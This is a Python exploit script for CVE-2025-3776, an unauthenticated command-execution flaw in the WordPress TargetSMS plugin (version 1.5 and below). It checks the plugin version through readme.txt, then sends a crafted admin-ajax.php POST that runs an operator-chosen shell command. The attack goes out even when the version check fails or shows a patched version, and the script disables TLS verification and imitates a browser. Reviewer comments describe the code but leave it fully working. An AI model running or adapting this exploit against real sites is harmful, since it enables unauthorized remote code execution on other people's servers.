import requests
import argparse
import re
# Exploit By: Nxploited ( Khaled Alenazi )
def disable_ssl_warnings():
    """Silence urllib3 warnings for the rest of the process.

    NOTE(review): this hides the warning urllib3 would otherwise print for
    unverified HTTPS requests; it does not make those requests any safer.
    """
    bundled_urllib3 = requests.packages.urllib3
    bundled_urllib3.disable_warnings()
def setup_user_agent():
    """Return the fixed desktop-Chrome User-Agent string used for every request.

    The value is a constant, so traffic from this script carries a
    browser-looking User-Agent rather than the default python-requests one.
    """
    browser_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    return browser_ua
def parse_arguments():
    """Parse the command line and return the resulting namespace.

    Options:
        -u / --url  (required) base URL of the WordPress site.
        -c / --cmd  command string, defaults to "whoami".
    """
    cli = argparse.ArgumentParser(
        description='CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5 # Exploit by Nxploited ( Khaled Alenazi )'
    )
    # Declared as data so both options are registered by the same call.
    option_specs = (
        (("-u", "--url"), {"required": True, "help": "Target WordPress site URL"}),
        (("-c", "--cmd"), {"default": "whoami", "help": "Command to execute (default: whoami)"}),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()
def prepare_session(user_agent):
    """Create the requests.Session shared by the version probe and the POST.

    Args:
        user_agent: value placed in the session's User-Agent header.

    Returns:
        The configured session.
    """
    client = requests.Session()
    client.headers.update({"User-Agent": user_agent})
    # NOTE(review): certificate validation is switched off for every request
    # made through this session, so nothing read back over HTTPS (including
    # the version string) is authenticated.
    client.verify = False
    return client
def normalize_url(base_url):
    """Return *base_url* with every trailing "/" removed.

    Only trailing slashes are touched; scheme, host and path are not
    validated or otherwise rewritten.
    """
    trimmed = base_url
    while trimmed.endswith("/"):
        trimmed = trimmed[:-1]
    return trimmed
def construct_readme_url(base_url):
    """Return the URL of the plugin's readme.txt under *base_url*.

    The path is the fixed plugin directory
    wp-content/plugins/verification-sms-targetsms/; a request for this file
    is the version probe that precedes the POST in this script.
    """
    readme_template = "{}/wp-content/plugins/verification-sms-targetsms/readme.txt"
    return readme_template.format(base_url)
def construct_exploit_url(base_url, cmd):
    """Return the admin-ajax.php URL carrying *cmd* as a query parameter.

    *cmd* is inserted as-is; no percent-encoding is applied here. Because
    the value travels in the query string, a request built from this URL
    shows up as /wp-admin/admin-ajax.php?cmd=... wherever request URLs are
    recorded.
    """
    ajax_template = "{}/wp-admin/admin-ajax.php?cmd={}"
    return ajax_template.format(base_url, cmd)
def construct_exploit_data():
    """Return the form fields sent in the POST body.

    Two fixed fields are produced: ``action`` (the AJAX action name) and
    ``callback``. A fresh dict is returned on every call.
    """
    return dict(action="targetvrHHndler", callback="evil")
def check_plugin_version(session, readme_url):
    """Fetch readme.txt and return its "Stable tag" as a float.

    Args:
        session: object with a requests-style ``get(url, timeout=...)``.
        readme_url: URL of the plugin's readme.txt.

    Returns:
        The parsed version, or None when the request fails, the status is
        not 200, or no "Stable tag:" line is found.
    """
    try:
        reply = session.get(readme_url, timeout=10)
        if reply.status_code != 200:
            return None
        tag = re.search(r"Stable tag:\s*([\d.]+)", reply.text)
        # NOTE(review): the pattern also matches multi-part tags such as
        # "1.4.2"; float() raises ValueError on those and that exception is
        # not handled in this function.
        return float(tag.group(1).strip()) if tag else None
    except requests.RequestException:
        return None
def is_plugin_vulnerable(version):
    """Return True when *version* is known and not greater than 1.5.

    None (version unknown) yields False.
    """
    if version is None:
        return False
    # NOTE(review): versions are compared as floats, so a tag like "1.10"
    # would have been parsed as 1.1 and treated as below 1.5.
    return version <= 1.5
def exploit(session, exploit_url, data):
    """POST *data* to *exploit_url* and report how the response is classified.

    Classification is by substring only:
      * "<pre>" in the body            -> reported as success, body printed
      * "status" and "false" in body   -> reported as failure
      * anything else                  -> reported as unexpected

    The HTTP status code is not inspected. Request errors are printed, not
    raised. Nothing is returned.
    """
    try:
        reply = session.post(exploit_url, data=data, timeout=10)
        body = reply.text
        if "<pre>" in body:
            print("\n[+] Exploit succeeded!")
            print(body.strip())
            print("\nExploit By : Nxploited ( Khaled Alenazi )")
            return
        if "status" in body and "false" in body:
            print("[-] Exploit failed. Callback may not exist or plugin is patched.")
            return
        print("[-] Unexpected response or server returned no valid output.")
    except requests.RequestException as err:
        print(f"[!] Error during exploitation: {err}")
def main():
    """Run the script: probe the plugin version, then send the POST.

    The version probe is advisory only. Whether the version is at or below
    1.5, above it, or could not be read at all, the POST is sent in every
    case, so an unreadable or altered readme.txt does not stop the request
    from being made.
    """
    disable_ssl_warnings()
    browser_ua = setup_user_agent()
    options = parse_arguments()
    client = prepare_session(browser_ua)

    site_root = normalize_url(options.url)
    probe_url = construct_readme_url(site_root)
    ajax_url = construct_exploit_url(site_root, options.cmd)
    form_fields = construct_exploit_data()

    print("[*] Checking plugin version...")
    detected = check_plugin_version(client, probe_url)
    # Truthiness test: both None and 0.0 count as "not determined".
    if not detected:
        print("[!] Could not determine plugin version. Proceeding with blind exploitation...")
    elif is_plugin_vulnerable(detected):
        print(f"[+] Plugin version detected: {detected}")
        print("[+] Plugin is vulnerable. Proceeding with exploitation...")
    else:
        print(f"[+] Plugin version detected: {detected}")
        print("[!] Plugin version > 1.5, may not be vulnerable. Attempting exploit anyway...")

    print("[*] Sending exploit request...")
    exploit(client, ajax_url, form_fields)


# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()